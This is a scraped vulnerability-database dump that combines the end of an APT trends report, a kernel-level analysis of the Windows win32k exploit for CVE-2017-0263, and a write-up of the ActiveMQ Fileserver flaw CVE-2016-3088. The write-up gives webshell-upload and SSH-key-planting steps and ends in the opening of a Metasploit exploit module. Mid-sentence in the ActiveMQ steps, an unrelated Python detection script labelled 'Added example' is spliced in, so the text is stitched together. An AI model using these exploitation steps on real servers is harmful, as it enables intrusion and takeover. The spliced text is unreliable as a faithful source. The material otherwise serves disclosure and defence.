veterans around two months before the publication of our report. The website was activated shortly after we published our report, during a national holiday period in Saudi Arabia. However, we didn't find any compromised application that could suggest a supply chain attack.

## **Southeast Asia and the Korean Peninsula**

Recently we discovered new Android malware disguised as a mobile messenger or as cryptocurrency-related applications. The new malware has several connections with KONNI, a Windows malware strain that has been used in the past to target a human rights organization and an individual/organization with an interest in Korean Peninsula affairs. KONNI has also previously targeted cryptocurrencies. The infected apps don't steal cryptocurrencies from a specific trading application or switch wallet addresses; they implement full-featured functionality to control an infected Android device and steal personal cryptocurrency using these features. We worked closely with a local CERT in order to take down the attacker's server, giving us a chance to investigate it.

We recently tracked new BlueNoroff activity. In particular, we identified a bank in Myanmar that was compromised by this actor and promptly contacted it to share the IoCs we had found. This collaboration allowed us to obtain valuable information on how the attackers move laterally to access high-value hosts, such as those owned by the bank's system engineers interacting with SWIFT. They use a public login credential dumper and homemade PowerShell scripts for lateral movement. BlueNoroff also employs new malware with an uncommon structure, probably to slow down analysis. Depending on the command-line parameters, this malware can run as a passive backdoor, an active backdoor or a tunneling tool; we believe the group runs this tool in different modes depending on the situation. Moreover, we found another type of PowerShell script used by this threat actor when it attacked a target in Turkey. This PowerShell script has similar functionality to those used previously, but BlueNoroff keeps changing it to evade detection.

Kaspersky observed a recent campaign utilizing a piece of malware referred to by FireEye as DADJOKE. This malware was first used in the wild in January 2019 and has undergone constant development since then. We have only observed this malware being used in a small number of active campaigns since January, all targeting government, military, and diplomatic entities in the Southeast Asia region.
The latest campaign was conducted on August 29 and seems to have targeted only a select few individuals working for a military organization.\n\nThe Andariel APT group, considered to be a sub-group of Lazarus, was initially described by the South Korean Financial Security Institute (FSI) in 2017. This threat actor has traditionally focused on geopolitical espionage and financial intelligence in South Korea. We have released several private intelligence reports on the group. We recently observed new efforts by this actor to build a new C2 infrastructure targeting vulnerable Weblogic servers, in this case exploiting CVE-2017-10271. Following a successful breach, the attackers implanted malware signed with a legitimate signature belonging to a South Korean security software vendor. Thanks to the quick response of the South Korean CERT, this signature was soon revoked. The malware is a brand new type of backdoor, called ApolloZeus, started by a shellcode wrapper with complex configuration data. This backdoor uses a relatively large shellcode in order to make analysis difficult. In addition, it implements a set of features to execute the final payload discreetly. The discovery of this malware allowed us to find several related samples, as well as documents used by the attackers to distribute it, providing us with a better understanding of the campaign. Indeed, we believe this attack is an early preparation stage for a new campaign, which also points to the attacker's intentions to replace their malware framework with the newly discovered artifacts.\n\n## **Other interesting discoveries**\n\nThe well-known Shadow Brokers leak Lost in Translation included an interesting Python script \u2013sigs.py \u2013 that contained lots of functions to check if a system had already been compromised by another threat actor. Each check is implemented as a function that looks for a unique signature in the system, for example, a file with a unique name or registry path. 
Although some checks are empty, 44 entries are listed in sigs.py, many of them related to unknown APTs that have not yet been publicly described. In 2018, we identified the APT described as the 27th function of the sigs.py file, which we call DarkUniverse. We assess with medium confidence that DarkUniverse is connected with the [ItaDuke](<https://www.fireeye.com/blog/threat-research/2013/02/its-a-kind-of-magic-1.html>) set of activity due to unique code overlaps. The main component is a rather simple DLL with only one exported function that implements persistence, malware integrity, communication with the C2 and control over other modules. We found about 20 victims in Western Asia and Northeastern Africa, including medical institutions, atomic energy bodies, military organizations and telecommunications companies.\n\nSince the beginning of 2019, we have observed the operation of new RCS (Remote Control System) implants for Android. RCS uses watermarks for different customers, which allowed us to correlate post-leak activity in the wild to obtain a global picture of how this malware is still being used, including the most recent cases. We detected RCS being used in Ethiopia in February, while additional samples with the same watermark were also detected in Morocco. The deployment method used depends on the actor, but the most common method consists of sending a legitimate backdoored application with RCS directly to the target using IM services (Telegram and WhatsApp).\n\n## **Final thoughts**\n\nIn seeking to evade detection, threat actors are refreshing their toolsets. This quarter, we have seen this clearly in Turla's development of its Tunnus backdoor and Topinambour dropper.\n\nHowever, when a new campaign is observed, it's not always immediately clear whether the tools used are the result of an established threat actor revamping its tools or a completely new threat actor making use of the tools developed by an existing APT group. 
In the case of Hexane, for example, it's unclear if this is a new development by OilRig, or the use of OilRig TTPs by a new group with similar interests in the Middle East, Africa and Southwest Asia.\n\nKorean-focused APT campaigns continue to dominate activities in Southeast Asia, a trend we first noted in our Q2 report.\n\nDespite the lower payouts by Zerodium for iOS exploits relative to those for Android, it's clear that mobile exploits continue to fetch very high prices. Our research into the ongoing use of RCS implants for Android and the revelations about the use of multiple iOS zero-days as described by Google and Citizen Lab underline the fact that mobile platforms have now become a standard aspect of APT attacks.\n\nAs always, we would note that our reports are the product of our visibility into the threat landscape. However, it needs to be borne in mind that, while we strive to continually improve, there is always the possibility that other sophisticated attacks may fly under our radar.", "cvss3": {}, "published": "2019-10-16T10:00:26", "type": "securelist", "title": "APT trends report Q3 2019", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-10271"], "modified": "2019-10-16T10:00:26", "id": "SECURELIST:2782756D428D10F166A1D130F4307D33", "href": "https://securelist.com/apt-trends-report-q3-2019/94530/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "seebug": [{"lastseen": "2017-11-19T11:57:45", "description": "May has been a busy month for vulnerabilities in the world's most popular desktop operating system. Hackers have made headlines with massive infections by WannaCry ransomware, which exploits an SMB security flaw and the ETERNALBLUE tool. 
Shortly prior, on May 9, Microsoft fixed CVE-2017-0263, which had made it possible for attackers to gain maximum system privileges on PCs running Windows 10, Windows 8.1, Windows 7, Windows Server 2008, Windows Server 2012, and Windows Server 2016.\r\n\r\nVulnerability CVE-2017-0263 had been used already in phishing messages. The emails contained an exploit that first entered the system by taking advantage of incorrect handling of EPS files by Microsoft Office (CVE-2017-0262) and then, once on the inside, leveraged CVE-2017-0263 to get full administrator rights. Two years ago we looked at a similar vulnerability in Windows, and here we will see how the new CVE-2017-0263 opens the way to \"pwning\" remote workstations and servers.\r\n\r\nIn a word, this is a use-after-free vulnerability (CWE-416)\u2014when context menu windows were closed and the memory occupied by the menu was freed up, the pointer to the freed-up memory was not zeroed out. As a result, the pointer could be reused.\r\n\r\nThe below discussion covers the process of window handling in the win32k.sys driver and how this process makes it possible to exploit the vulnerability.\r\n#### Context menus\r\nEvery Windows user is familiar with context menus. These are the menus that drop down when we right-click.\r\n\r\n\r\nThe appearance of this menu and how it is displayed are completely up to the developer of each application. 
WinAPI provides developers with the TrackPopupMenuEx function, which causes a context menu to appear with the specified parameters at the specified location on the screen.\r\nThe state of the context menu is stored in the kernel in the variable win32k!gMenuState, which is a win32k!tagMENUSTATE structure:\r\n```\r\n0: kd> dt win32k!tagMenuState\r\n +0x000 pGlobalPopupMenu : Ptr32 tagPOPUPMENU\r\n +0x004 flags : Int4B\r\n +0x008 ptMouseLast : tagPOINT\r\n +0x010 mnFocus : Int4B\r\n +0x014 cmdLast : Int4B\r\n +0x018 ptiMenuStateOwner : Ptr32 tagTHREADINFO\r\n +0x01c dwLockCount : Uint4B\r\n +0x020 pmnsPrev : Ptr32 tagMENUSTATE\r\n +0x024 ptButtonDown : tagPOINT\r\n +0x02c uButtonDownHitArea: Uint4B\r\n +0x030 uButtonDownIndex : Uint4B\r\n +0x034 vkButtonDown : Int4B\r\n +0x038 uDraggingHitArea : Uint4B\r\n +0x03c uDraggingIndex : Uint4B\r\n +0x040 uDraggingFlags : Uint4B\r\n +0x044 hdcWndAni : Ptr32 HDC__\r\n +0x048 dwAniStartTime : Uint4B\r\n +0x04c ixAni : Int4B\r\n +0x050 iyAni : Int4B\r\n +0x054 cxAni : Int4B\r\n +0x058 cyAni : Int4B\r\n +0x05c hbmAni : Ptr32 HBITMAP__\r\n +0x060 hdcAni : Ptr32 HDC__\r\n```\r\nNote that all of the call stacks and structures presented here are taken from Windows 7 x86. The 32-bit OS version is used for convenience: arguments for most functions are stored on the stack and there is no WoW64 layer, which during system calls switches to a 64-bit stack due to which 32-bit stack frames are lost when the call stack is printed. A full list of vulnerable operating systems is given on the Microsoft website.\r\n\r\nThe win32k!tagMENUSTATE structure stores, for example, such information as: the clicked region of the screen, number of the most recent menu command, and pointers to the windows that were clicked or selected for drag-and-drop. 
The list of context menu windows is stored in the first field, pGlobalPopupMenu, which is of the type win32k!tagPOPUPMENU:\r\n```\r\n0: kd> dt win32k!tagPopupMenu\r\n +0x000 flags : Int4B\r\n +0x004 spwndNotify : Ptr32 tagWND\r\n +0x008 spwndPopupMenu : Ptr32 tagWND\r\n +0x00c spwndNextPopup : Ptr32 tagWND\r\n +0x010 spwndPrevPopup : Ptr32 tagWND\r\n +0x014 spmenu : Ptr32 tagMENU\r\n +0x018 spmenuAlternate : Ptr32 tagMENU\r\n +0x01c spwndActivePopup : Ptr32 tagWND\r\n +0x020 ppopupmenuRoot : Ptr32 tagPOPUPMENU\r\n +0x024 ppmDelayedFree : Ptr32 tagPOPUPMENU\r\n +0x028 posSelectedItem : Uint4B\r\n +0x02c posDropped : Uint4B\r\n +0x030 ppmlockFree : Ptr32 tagPOPUPMENU\r\n```\r\nIn both structures we have highlighted the fields of interest, which will be used below to describe the exploitation process.\r\n\r\nThe variable win32k!gMenuState is initialized when a context menu is created, during the previously mentioned TrackPopupMenuEx function. Initialization occurs when win32k!xxxMNAllocMenuState is called:\r\n```\r\n1: kd> k\r\n # ChildEBP RetAddr \r\n00 95f29b38 81fe3ca6 win32k!xxxMNAllocMenuState+0x7c\r\n01 95f29ba0 81fe410f win32k!xxxTrackPopupMenuEx+0x27f\r\n02 95f29c14 82892db6 win32k!NtUserTrackPopupMenuEx+0xc3\r\n03 95f29c14 77666c74 nt!KiSystemServicePostCall\r\n04 0131fd58 7758480e ntdll!KiFastSystemCallRet\r\n05 0131fd5c 100015b3 user32!NtUserTrackPopupMenuEx+0xc\r\n06 0131fd84 7756c4b7 q_Main_Window_Class_wndproc (call TrackPopupMenuEx)\r\n```\r\nAnd when the context menu is no longer needed\u2014for example, the user selected a menu item or clicked outside of the menu\u2014the function win32k!xxxMNEndMenuState is called and frees up the state of the menu:\r\n```\r\n1: kd> k\r\n # ChildEBP RetAddr \r\n00 a0fb7ab0 82014f68 win32k!xxxMNEndMenuState\r\n01 a0fb7b20 81fe39f5 win32k!xxxRealMenuWindowProc+0xd46\r\n02 a0fb7b54 81f5c134 win32k!xxxMenuWindowProc+0xfd\r\n03 a0fb7b94 81f1bb74 win32k!xxxSendMessageTimeout+0x1ac\r\n04 a0fb7bbc 81f289c8 
win32k!xxxWrapSendMessage+0x1c\r\n05 a0fb7bd8 81f5e149 win32k!NtUserfnNCDESTROY+0x27\r\n06 a0fb7c10 82892db6 win32k!NtUserMessageCall+0xcf\r\n07 a0fb7c10 77666c74 nt!KiSystemServicePostCall\r\n08 013cfd90 77564f21 ntdll!KiFastSystemCallRet\r\n09 013cfd94 77560908 user32!NtUserMessageCall+0xc\r\n0a 013cfdd0 77565552 user32!SendMessageWorker+0x546\r\n0b 013cfdf0 100014e4 user32!SendMessageW+0x7c\r\n0c 013cfe08 775630bc q_win_event_hook (call SendMessageW(MN_DODRAGDROP))\r\n```\r\n\r\nImportant here is that the gMenuState.pGlobalPopupMenu field is updated only during initialization in the xxxMNAllocMenuState function\u2014it is not zeroed out when the structure is destroyed.\r\n\r\n#### xxxMNEndMenuState function\r\nThis function is the star of our story. Its handful of lines harbor the vulnerability.\r\n\r\n\r\nxxxMNEndMenuState starts with deinitialization and freeing of information related to the context menu. The MNFreePopup function\u2014to which we will return in the following section\u2014is called. The main task of MNFreePopup is to decrement reference counters for windows related to the particular context menu. When the reference count falls to zero, this decrementing can cause the window to be destroyed.\r\n\r\nThen the xxxMNEndMenuState function checks the fMenuWindowRef flag of the pGlobalPopupMenu field to see if any references remain to the main window of the context menu. 
This flag is cleared upon destruction of the window contained in the spwndPopupMenu field of the context menu:\r\n```\r\n3: kd> k\r\n # ChildEBP RetAddr \r\n00 95fffa5c 81f287da win32k!xxxFreeWindow+0x847\r\n01 95fffab0 81f71252 win32k!xxxDestroyWindow+0x532\r\n02 95fffabc 81f7122c win32k!HMDestroyUnlockedObject+0x1b\r\n03 95fffac8 81f70c4a win32k!HMUnlockObjectInternal+0x30\r\n04 95fffad4 81f6e1fc win32k!HMUnlockObject+0x13\r\n05 95fffadc 81fea664 win32k!HMAssignmentUnlock+0xf\r\n06 95fffaec 81fea885 win32k!MNFreePopup+0x7d\r\n07 95fffb14 8202c3d6 win32k!xxxMNEndMenuState+0x40\r\n\r\nxxxFreeWindow+83f disasm:\r\n.text:BF89082E loc_BF89082E:\r\n.text:BF89082E and ecx, 7FFFFFFFh ; ~fMenuWindowRef\r\n.text:BF890834 mov [eax+tagPOPUPMENU.flags], ecx\r\n```\r\nAs seen above, the flag is discarded and therefore the memory occupied by the pGlobalPopupMenu field is freed up, but the pointer itself is not zeroed out. This causes a dangling pointer, which under certain circumstances can be reused.\r\n\r\nImmediately after the context menu memory is freed up, the execution flow deletes the references stored in the context menu state structure that relate to clicked windows (uButtonDownHitArea field) when the menu was active or were selected for drag-and-drop (uDraggingHitArea field).\r\n#### Exploitation method\r\nA window object in the kernel is described by a tagWND structure. There we describe the concept of kernel callbacks, which will be needed here as well. The number of active references to a window is stored in the cLockObj field of the tagWND structure.\r\n\r\nDeleting references to a window, as shown in the previous section, can cause the window itself to be destroyed. Before the window is destroyed, a WM_NCDESTROY change-of-window-state message is sent to the window.\r\n\r\nThis means that while xxxMNEndMenuState is running, control can be transferred to user application code\u2014specifically, to the window procedure of the window being destroyed. 
This happens when no references remain to a window whose pointer is stored in the gMenuState.uButtonDownHitArea field. \r\n```\r\n2: kd> k\r\n # ChildEBP RetAddr \r\n0138fc34 7756c4b7 q_new_SysShadow_window_proc\r\n0138fc60 77565f6f USER32!InternalCallWinProc+0x23\r\n0138fcd8 77564ede USER32!UserCallWinProcCheckWow+0xe0\r\n0138fd34 7755b28f USER32!DispatchClientMessage+0xcf\r\n0138fd64 77666bae USER32!__fnNCDESTROY+0x26\r\n0138fd90 77564f21 ntdll!KiUserCallbackDispatcher+0x2e \r\n95fe38f8 81f56d86 nt!KeUserModeCallback\r\n95fe3940 81f5c157 win32k!xxxSendMessageToClient+0x175\r\n95fe398c 81f5c206 win32k!xxxSendMessageTimeout+0x1cf\r\n95fe39b4 81f2839c win32k!xxxSendMessage+0x28\r\n95fe3a10 81f2fb00 win32k!xxxDestroyWindow+0xf4\r\n95fe3a24 81f302ee win32k!xxxRemoveShadow+0x3e\r\n95fe3a64 81f287da win32k!xxxFreeWindow+0x2ff\r\n95fe3ab8 81f71252 win32k!xxxDestroyWindow+0x532\r\n95fe3ac4 81f7122c win32k!HMDestroyUnlockedObject+0x1b\r\n95fe3ad0 81f70c4a win32k!HMUnlockObjectInternal+0x30\r\n95fe3adc 81f6e1fc win32k!HMUnlockObject+0x13\r\n95fe3ae4 81fe4162 win32k!HMAssignmentUnlock+0xf\r\n95fe3aec 81fea8c3 win32k!UnlockMFMWFPWindow+0x18\r\n95fe3b14 8202c3d6 win32k!xxxMNEndMenuState+0x7e \r\n```\r\nFor example, in the call stack shown above, the WM_NCDESTROY message is handled by the window procedure for the SysShadow window class. Windows of this class are designed to provide shadowing and are usually destroyed together with the windows for which they are shadowing.\r\nNow let's see the most interesting part of how this window message is handled, in the form that was found in the malware sample taken from a .docx phishing attachment:\r\n\r\n\r\nWhen the attacker takes control, the first matter of business is to occupy the now-free memory that was just occupied by gMenuState.pGlobalPopupMenu, in order to reuse this pointer later. 
Attempting to allocate the indicated memory block, the exploit performs a large number of SetClassLongW calls, thus setting a specially formed menu name for window classes that have been specially created for this purpose:\r\n```\r\n2: kd> k\r\n # ChildEBP RetAddr \r\n00 9f74bafc 81f240d2 win32k!memcpy+0x33\r\n01 9f74bb3c 81edadb1 win32k!AllocateUnicodeString+0x6b\r\n02 9f74bb9c 81edb146 win32k!xxxSetClassData+0x1d1\r\n03 9f74bbb8 81edb088 win32k!xxxSetClassLong+0x39\r\n04 9f74bc1c 82892db6 win32k!NtUserSetClassLong+0xc8\r\n05 9f74bc1c 77666c74 nt!KiSystemServicePostCall\r\n06 0136fac0 7755658b ntdll!KiFastSystemCallRet\r\n07 0136fac4 775565bf user32!NtUserSetClassLong+0xc\r\n08 0136fafc 10001a52 user32!SetClassLongW+0x5e\r\n09 0136fc34 7756c4b7 q_new_SysShadow_window_proc (call SetClassLongW)\r\n```\r\n\r\nAfter the memory is occupied, the next stage begins. The exploit accesses the NtUserMNDragLeave system procedure, which performs a nested call of the xxxMNEndMenuState function. Clearing of the gMenuState structure starts again:\r\n```\r\n2: kd> k\r\n # ChildEBP RetAddr \r\n00 9f74bbf0 8202c3d6 win32k!xxxMNEndMenuState\r\n01 9f74bc04 8202c40e win32k!xxxUnlockMenuStateInternal+0x2e\r\n02 9f74bc14 82015672 win32k!xxxUnlockAndEndMenuState+0xf\r\n03 9f74bc24 82001728 win32k!xxxMNDragLeave+0x45\r\n04 9f74bc2c 82892db6 win32k!NtUserMNDragLeave+0xd\r\n05 9f74bc2c 100010a9 nt!KiSystemServicePostCall\r\n06 0136fafc 10001a84 q_exec_int2e (int 2Eh)\r\n07 0136fc34 7756c4b7 q_new_SysShadow_window_proc (call q_exec_int2e)\r\n```\r\nAs described in the previous section, the procedure starts by deinitializing the pGlobalPopupMenu field; this process is performed by the MNFreePopup call, which decrements the reference counters for windows contained in various fields of tagPOPUPMENU. After the prior step, the content of this structure is now controlled by the attacker. 
So when the described chain of actions is performed, the attacker gets a decrement primitive to an arbitrary kernel address.\r\n\r\nIn this exploit, an address is inserted in the tagPOPUPMENU.spwndPrevPopup field and the primitive is used to decrement the field for flags of one of the windows, causing that window to be marked with the flag bServerSideProc, which means that its window procedure is run in the kernel.\r\nAs the code shows, immediately after returning from NtUserMNDragLeave, a message is sent to the window by a SendMessage call, causing arbitrary kernel code execution. At this stage, the attacker usually steals a system process token to obtain system privileges. Indeed, this is what happened in the exploit here.\r\n\r\n#### In conclusion\r\nWhat are the salient points of the exploit? The most common cause of vulnerabilities in the win32k.sys library is access to callbacks in user space when any kernel structures are in an intermediate stage when a transaction is changing them. Setting the bServerSideProc flag for a window is also a popular method for kernel code execution. In addition, the most convenient method to leverage kernel code execution for privilege escalation is to copy a reference to a system token.\r\n\r\nIn that sense, the exploit looks rather mundane. At the same time many of the nuances have been simplified or purposefully omitted from this discussion.\r\n\r\nFor example, we did not dwell on the exact appearance of the context menu or menu-related actions that cause the necessary state of the flags and fields of the win32k!gMenuState variable during execution of the xxxMNEndMenuState procedure. Left unmentioned was the fact that the menu names set during SetClassLong calls should, on the one hand, be a Unicode string with no null characters but, on the other hand, be a legitimate tagPOPUPMENU structure. 
This also means that the address of the window in the kernel (to which the decrement field will refer) must not contain any wchar_t null characters. These are just a few examples from a rather long list. \r\n\r\nAs for the update that fixes the vulnerability, a quick glance shows that the buffer addressed by the gMenuState.pGlobalPopupMenu field is now freed closer to the end of the xxxMNEndMenuState function, much later after the MNFreePopup and UnlockMFMWFPWindow calls, and is accompanied by zeroing-out of the pointer. Thus the patch addresses two causes whose simultaneous presence caused the vulnerability to occur.", "cvss3": {}, "published": "2017-05-19T00:00:00", "type": "seebug", "title": "Win32k Elevation of Privilege Vulnerability(CVE-2017-0263)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-0262", "CVE-2017-0263"], "modified": "2017-05-19T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-93116", "id": "SSV:93116", "sourceData": "", "sourceHref": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T11:56:57", "description": "Author: **Knownsec 404 Team**\n\n#### 1\\. Background overview\n\nActiveMQ is an open source message-oriented middleware project of the Apache Software Foundation. Jetty is an open source servlet container that provides the Java web container runtime for JSP pages and servlets. ActiveMQ 5.0 and later versions embed Jetty by default and, once started, expose a web application for monitoring ActiveMQ.\n\nOn April 14, 2016, security researcher Simon Zuckerbraun disclosed multiple security vulnerabilities in the Apache ActiveMQ Fileserver that allow a remote attacker to replace web application files on an affected system with malicious code and thereby achieve remote code execution (CVE-2016-3088).\n\n#### 2\\. 
Principles of analysis\n\nThe FileServer service in ActiveMQ lets a user upload a file to a specified directory with the HTTP PUT method. Downloading the [ActiveMQ 5.7.0 source code](<http://archive.apache.org/dist/activemq/apache-activemq/5.7.0/activemq-parent-5.7.0-source-release.zip>), the key server-side code that handles PUT is as follows\n\n\n\nThe user can upload a file into a specified directory; that directory is defined in `conf/jetty.xml` as follows\n\n\n\nInterestingly, by forging a special upload path we can make the server disclose its absolute path\n\n\n\nTracing the PUT method further, we can see the call to the following function\n\n\n\nThe key server-side code that handles MOVE is as follows. Note that the method applies no restriction or filtering at all to the destination path.\n\n\n\nThus we can construct a PUT request to upload a webshell into the fileserver directory and then use the MOVE method to move it into the admin/ directory, where it has execute permissions.\n\n#### 3\\. Exploitation approaches\n\nBased on the vulnerability principle above, several ways of exploiting it come to mind.\n\nNote: the following results were reproduced on ActiveMQ 5.7.0; during reproduction the MOVE method was very unstable.\n\n * Uploading a webshell\n\nFirst, PUT a JSP webshell into the fileserver directory\n\n\n\nIn the fileserver/ directory the webshell has no execute permissions\n\n\n\nDisclose the absolute path\n\n\n\nThen use the MOVE method to move the webshell into the admin/ directory; a relative path can also be used\n\n\n\nVisiting http://localhost:8161/admin/1.jsp?cmd=ls, the command executes successfully and the results are as follows\n\n\n\n \n\n\n * Uploading an SSH public key\n\nSince arbitrary files can be uploaded and moved, it is natural to think of uploading our own SSH public key to enable SSH login.\n\nFirst generate the key pair. 
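As an added example (not code from the original write-up or from the ActiveMQ project), the following Python script shows what a defender can do with two facts established above: the PUT, MOVE and subsequent request to the moved file leave a characteristic trace in the web server's access log, and the Fileserver web application is a discrete context defined in conf/jetty.xml that can be audited. The log lines, client addresses, file names and the jetty.xml fragment are constructed samples; the Spring-beans layout with one WebAppContext bean per web application is assumed from ActiveMQ's shipped configuration.

```python
"""Defensive checks for the ActiveMQ Fileserver PUT/MOVE issue (CVE-2016-3088).

Added example, not code from the original write-up or from the ActiveMQ
project. It (1) correlates access-log lines that show the PUT -> MOVE ->
request sequence described above and (2) audits a conf/jetty.xml for a
still-mounted /fileserver web application context. All log lines,
addresses, file names and the XML fragment are constructed samples.
"""
import re
import xml.etree.ElementTree as ET
from collections import defaultdict

# NCSA common-log layout, which Jetty's request log also produces.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample: one full PUT/MOVE/execute chain from 203.0.113.7 and a
# benign upload-then-download from 198.51.100.9 that must not be flagged.
SAMPLE_LOG = """\
203.0.113.7 - - [04/Jul/2017:10:15:01 +0000] "GET /admin/ HTTP/1.1" 200 8123
203.0.113.7 - - [04/Jul/2017:10:15:02 +0000] "PUT /fileserver/1.jsp HTTP/1.1" 204 0
203.0.113.7 - - [04/Jul/2017:10:15:03 +0000] "MOVE /fileserver/1.jsp HTTP/1.1" 204 0
203.0.113.7 - - [04/Jul/2017:10:15:05 +0000] "GET /admin/1.jsp?cmd=ls HTTP/1.1" 200 512
198.51.100.9 - - [04/Jul/2017:10:16:00 +0000] "PUT /fileserver/report.txt HTTP/1.1" 204 0
198.51.100.9 - - [04/Jul/2017:10:16:01 +0000] "GET /fileserver/report.txt HTTP/1.1" 200 77
"""


def parse_line(line):
    """Split one access-log line into its fields, or return None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_fileserver_abuse(lines):
    """Return findings in log order.

    kind == 'move'  : any MOVE aimed at /fileserver/ (the normal web consoles
                      never use this method, so each one deserves a look).
    kind == 'chain' : a file PUT into /fileserver/, MOVEd, and then requested
                      by the same client under another context, i.e. the
                      webshell sequence described in the write-up.
    """
    staged = defaultdict(dict)   # ip -> {file name: 'put' | 'moved' | 'reported'}
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, method, status = rec['ip'], rec['method'], rec['status']
        path = rec['path'].split('?', 1)[0]          # drop the query string
        name = path.rsplit('/', 1)[-1]               # file name the client chose
        in_fileserver = path.startswith('/fileserver/')
        if method == 'PUT' and in_fileserver and status.startswith('2'):
            staged[ip][name] = 'put'
        elif method == 'MOVE' and in_fileserver:
            findings.append({'kind': 'move', 'ip': ip, 'file': name, 'time': rec['ts']})
            if staged[ip].get(name) == 'put':
                staged[ip][name] = 'moved'
        elif not in_fileserver and staged[ip].get(name) == 'moved':
            findings.append({'kind': 'chain', 'ip': ip, 'file': name,
                             'executed_at': path, 'time': rec['ts']})
            staged[ip][name] = 'reported'
    return findings


# Constructed fragment in the Spring-beans layout that ActiveMQ's shipped
# conf/jetty.xml uses (assumption: one WebAppContext bean per web application).
SAMPLE_JETTY_XML = """\
<beans xmlns="http://www.springframework.org/schema/beans">
  <bean class="org.eclipse.jetty.webapp.WebAppContext">
    <property name="contextPath" value="/admin"/>
    <property name="resourceBase" value="${activemq.home}/webapps/admin"/>
  </bean>
  <bean class="org.eclipse.jetty.webapp.WebAppContext">
    <property name="contextPath" value="/fileserver"/>
    <property name="resourceBase" value="${activemq.home}/webapps/fileserver"/>
  </bean>
</beans>
"""


def _local(tag):
    """Strip the XML namespace: '{http://...}bean' -> 'bean'."""
    return tag.rsplit('}', 1)[-1]


def fileserver_contexts(jetty_xml):
    """Return the resourceBase of every WebAppContext still mounted at /fileserver.

    An empty list means the Fileserver web application is not configured,
    which is the state the remediation in the write-up aims for.
    """
    root = ET.fromstring(jetty_xml)
    hits = []
    for bean in root.iter():
        if _local(bean.tag) != 'bean':
            continue
        if bean.get('class') != 'org.eclipse.jetty.webapp.WebAppContext':
            continue
        props = {p.get('name'): p.get('value') for p in bean if _local(p.tag) == 'property'}
        if props.get('contextPath') == '/fileserver':
            hits.append(props.get('resourceBase'))
    return hits


if __name__ == '__main__':
    for finding in find_fileserver_abuse(SAMPLE_LOG.splitlines()):
        print(finding)
    print('fileserver contexts still mounted:', fileserver_contexts(SAMPLE_JETTY_XML))
```

The 'move' finding fires on the MOVE alone because nothing in the ActiveMQ consoles issues that method, while the 'chain' finding requires the same client to fetch the moved file under a different context, which is the low-noise signal for an actually planted webshell. The audit deliberately reports the resourceBase rather than a boolean, so an operator can see which directory would have been writable before deciding to remove the bean or upgrade to 5.14.0 or later.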
This is not required if a key pair already exists.\n\n\n\nThen upload it, move it to `/root/.ssh/` and rename it to `authorized_keys`\n\n \n\nAfter that, log in directly over SSH.\n\n\n\n#### 4\\. Vulnerability impact\n\nAffected versions: Apache ActiveMQ 5.x ~ 5.14.0\n\nUsing [ZoomEye](<https://www.zoomeye.org>) with the date and \"ActiveMQ\" as search keys, we retrieved the total number of ActiveMQ instances visible on the Internet as of January 1, 2015 (one year before the vulnerability was disclosed) and as of January 1, 2017 (one year after), as follows.\n\n \n\nThere is a very substantial reduction in the number of exposed ActiveMQ instances between before and after the disclosure, from which we can roughly infer that many ActiveMQ web services were restricted from public access after the disclosure.\n\n#### 5\\. Vulnerability remediation\n\n1. The ActiveMQ Fileserver function has been removed in 5.14.0 and later versions. Users are advised to upgrade to 5.14.0 or later.\n\n2. Disable the ActiveMQ Fileserver function by removing the following configuration from `conf\\jetty.xml`\n\n\n\n#### 6\\. 
Reference links\n\n[1] http://activemq.apache.org/security-advisories.data/CVE-2016-3088-announcement.txt \n[2] https://www.seebug.org/vuldb/ssvid-96268\n", "cvss3": {}, "published": "2017-07-04T00:00:00", "type": "seebug", "title": "Apache ActiveMQ Fileserver remote code execution vulnerability(CVE-2016-3088)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-3088"], "modified": "2017-07-04T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96268", "id": "SSV:96268", "sourceData": "\n ##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'ActiveMQ web shell upload',\r\n 'Description' => %q(\r\n The Fileserver web application in Apache ActiveMQ 5.x before 5.14.0\r\n allows remote attackers to upload and execute arbitrary files via an\r\n HTTP PUT followed by an HTTP MOVE request.\r\n ),\r\n 'Author' => [ 'Ian Anderson <andrsn84[at]gmail.com>', 'Hillary Benson <1n7r1gu3[at]gmail.com>' ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'CVE', '2016-3088' ],\r\n [ 'URL', 'http://activemq.apache.org/security-advisories.data/CVE-2016-3088-announcement.txt' ]\r\n ],\r\n 'Privileged' => true,\r\n 'Platform' => %w{ java linux win },\r\n 'Targets' =>\r\n [\r\n [ 'Java Universal',\r\n {\r\n 'Platform' => 'java',\r\n 'Arch' => ARCH_JAVA\r\n }\r\n ],\r\n [ 'Linux',\r\n {\r\n 'Platform' => 'linux',\r\n 'Arch' => ARCH_X86\r\n }\r\n ],\r\n [ 'Windows',\r\n {\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X86\r\n }\r\n ]\r\n ],\r\n 'DisclosureDate' => \"Jun 01 2016\",\r\n 'DefaultTarget' => 0))\r\n register_options(\r\n [\r\n OptString.new('BasicAuthUser', [ true, 'The username to authenticate as', 'admin' ]),\r\n 
